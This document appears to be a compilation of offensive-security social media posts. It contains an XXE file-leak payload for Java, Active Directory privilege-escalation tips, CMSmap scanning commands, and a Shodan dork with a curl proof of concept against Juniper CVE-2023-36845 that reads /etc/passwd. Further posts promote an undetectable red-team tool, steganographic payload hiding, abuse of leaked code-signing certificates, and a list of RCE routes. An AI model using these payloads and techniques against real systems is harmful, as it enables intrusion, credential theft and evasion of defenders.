If your exploiting your XXE under Java, I recommend a payload like this:
<!DOCTYPE root [
<!ENTITY stuff SYSTEM ".">
]><root>&stuff;</root>
So that you can start the file leak from the CWD of the Java process. This is important when chaining for an RCE.
AD: Local Admin to Domain Admin
It doesn't matter if you don't see active sessions, always look in the Kerberos cache.
query session VS klist sessions
Don't attempt an LSASS DUMP, move on!
GIUDA 2023090500
Now FUD again
github.com/foxlox/GIUDA#redteam#adprivesc#kerberos#lsass
Scan for WordPress, Joomla, Drupal and Moodle bugs via CMSmap.
Clone it.
Install The Exploit Database.
Update the CMSmap Database.
github.com/dionach/CMSmapgithub.com/Doctype02/exploit…
Run it on file mode.
python3 cmsmap.py -i test.txt -t 200 -F -s -o test-resulte.txt
Juniper J-Web - Remote Code Execution 🔥 - CVE-2023-36845
Nearly 14,000 Juniper devices are affected, as a search on Shodan shows:
Dork : title:"Juniper" http.favicon.hash:2141724739
Poc:
curl <TARGET> -F $'auto_prepend_file="/etc/passwd\n"' -F 'PHPRC=/dev/fd/0'
Here is a vulnerability scanner that has been specially developed to spot this vulnerability or you can also use Nuclei:
github.com/vulncheck-oss/cve…#Infosec#Juniper#ZeroDay#CVE#Hacking
How To Hack Web Applications with @hakluke 👇
⚙️ Setting up Burp Suite
🪲 Remote Command/Code Execution (RCE)
💉 SQL Injection
💉 XML External Entity Injection
🐛 Insecure Deserialization
🐞 XSS
#HackerContentBlogslabs.detectify.com/2022/05/1…
Here is a small POC for doing steganography with Nim-Lang. Useful for reducing payload entropy on disk or giving you a remote Killswitch.
github.com/OffenseTeacher/St…
Revamping my ☢️ Modern Initial Access training feels soo good!
Next week's @x33fcon session will be a blast!
- Nuked away VBA slides
- 10 leaked code signing certs & abuse guidance
- Signed & weaponised MSIX
- Signed ClickOnce (hopefully!)🤞
- plenty of Complex Infection Chains
Common ways to get RCE:
- SSRF to Metadata
- Jenkins /script
- Jenkins Orange RCE
- Leaked cloud creds/keys (online, via LFD, ect)
- Arbitrary file upload
- ImageTragik
- SSTI
Fill in how you've gotten RCE!